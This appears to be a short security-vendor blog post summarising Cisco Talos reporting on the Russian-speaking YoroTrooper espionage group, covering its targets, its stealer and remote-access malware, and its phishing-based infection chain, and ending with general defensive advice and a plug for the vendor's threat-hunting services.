A threat actor identified as “YoroTrooper” has had several espionage campaigns attributed to it by Cisco Talos since June of 2022. YoroTrooper has targeted government and energy organizations in the Commonwealth of Independent States (CIS), a health care agency in the European Union and the World Intellectual Property Organization (WIPO). Due to the presence of Cyrillic characters in several of the implants that were used, Cisco Talos believes the group to be Russian-speaking. Their toolkit primarily consists of custom and open-source Python based information stealers such as the Stink Stealer which is compiled into an executable using tools like Pyinstaller. For remote access YoroTrooper primarily deployed commodity malware such as AveMaria, Warzone RAT, LodaRAT and Meterpreter. The infection chain uses spearphishing techniques to convince their victims to download a malicious archive file containing .LNK files. These link files download a malicious HTA file which loads the final dropper, starting the Python based stealer software.
Phishing techniques have a high prevalence in the current threat landscape and are often employed as an initial attack vector by threat groups. Archive files hiding malicious payloads are also frequently utilized by threat groups. Additionally, YoroTrooper makes use of open source and on-the-market tools to make attribution more difficult. However, these tactics also present an opportunity for defenders and researchers to develop detections for an attacker’s toolkit by focusing on open source offensive tools. A strong phishing awareness program, when paired with reviewing the risks of social engineering, strengthens an organization’s security posture and can stop threats before landing on a network. However, perimeter security is more effective as part of a defense in depth strategy that also proactively hunts for post compromise activities. Binary Defense’s MDR and Threat Hunting offerings are an excellent solution to assist with such a strategy.